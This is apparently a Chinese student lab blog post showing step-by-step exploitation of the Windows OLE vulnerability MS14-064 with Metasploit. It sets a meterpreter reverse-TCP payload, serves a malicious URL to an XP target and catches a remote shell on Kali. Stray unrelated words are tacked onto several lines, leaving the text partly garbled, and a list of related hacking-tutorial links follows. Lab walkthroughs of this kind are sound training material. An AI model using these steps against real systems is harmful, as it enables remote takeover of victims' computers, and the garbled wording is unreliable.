MS14-064 漏洞测试入侵——20145301
MS14-064 漏洞测试入侵
Microsoft Windows OLE远程代码执行漏洞,OLE(对象连接与嵌入)是一种容许应用程序共享数据和功能的技术
执行摘要
-
此安全更新可解决 Microsoft Windows 对象连接与嵌入 (OLE) 中 2 个私下报告的漏洞。最严重的漏洞可能在用户使用 Internet Explorer 查看经特殊设计的网页时容许远程执行代码。成功利用这些漏洞的攻击者能够在当前用户的上下文中运行任意代码。若是当前用户使用管理用户权限登陆,则攻击者可随后安装程序;查看、更改或删除数据;或者建立拥有彻底用户权限的新账户。那些账户被配置为拥有较少用户权限的用户比具备管理用户权限的用户受到的影响要小。 对于 Microsoft Windows 全部受支持的版本,此安全更新的等级为“严重”。更多详细信息可见:微软安全技术中心shell
-
远程攻击者利用此漏洞经过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本windows
实践过程
- 此漏洞利用的模块 :exploit/windows/browser/ms14_064_ole_code_execution
执行命令:
-
msfconsole //启动MSF安全
-
search ms14 //能够搜索14年的漏洞tcp
-
use exploit/windows/browser/ms14_064_ole_code_execution // 加载漏洞利用模块测试
-
show payload //查看可用网站
-
set payload windows/meterpreter/reverse_tcp //设置反弹链接shellui
- info查看详细信息
-
特别注意:上图在requied列中“yes”的属性是必须要的。其中标记的第一个属性默认为false 须要设置为true ,由于msf中自带的漏洞利用exp调用的是 powershell。 因此msf中的exp代码只对安装powershell的系统生效。查看信息,能够攻击的系统有xp和win7设计
-
各个属性配置好后 执行exploit便可code
-
获得一个URL地址,到靶机上进行(xp)测试对象
-
kail反弹了一个shell,测试成功
- 1. MS14-064 漏洞测试入侵win7
- 2. MS17-010漏洞入侵
- 3. web-入侵之注入漏洞php+mysql
- 4. 19、SQL注入漏洞测试入门
- 5. 漏洞测试项
- 6. CSRF 漏洞测试
- 7. 利用IE浏览器漏洞入侵
- 8. WEB漏洞测试(五)——SQL注入
- 9. SQL ----post漏洞测试注入
- 10. DVWA漏洞测试之SQL注入
- 更多相关文章...
- • Maven 构建 & 项目测试 - Maven教程
- • Lua 调试(Debug) - Lua 教程
- • YAML 入门教程
- • Java Agent入门实战(一)-Instrumentation介绍与使用
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. MS14-064 漏洞测试入侵win7
- 2. MS17-010漏洞入侵
- 3. web-入侵之注入漏洞php+mysql
- 4. 19、SQL注入漏洞测试入门
- 5. 漏洞测试项
- 6. CSRF 漏洞测试
- 7. 利用IE浏览器漏洞入侵
- 8. WEB漏洞测试(五)——SQL注入
- 9. SQL ----post漏洞测试注入
- 10. DVWA漏洞测试之SQL注入